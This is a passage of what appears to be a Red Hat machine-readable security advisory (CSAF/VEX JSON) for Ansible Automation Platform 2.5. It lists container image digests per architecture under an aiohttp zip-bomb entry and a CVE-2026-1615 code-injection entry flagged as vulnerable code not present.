"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
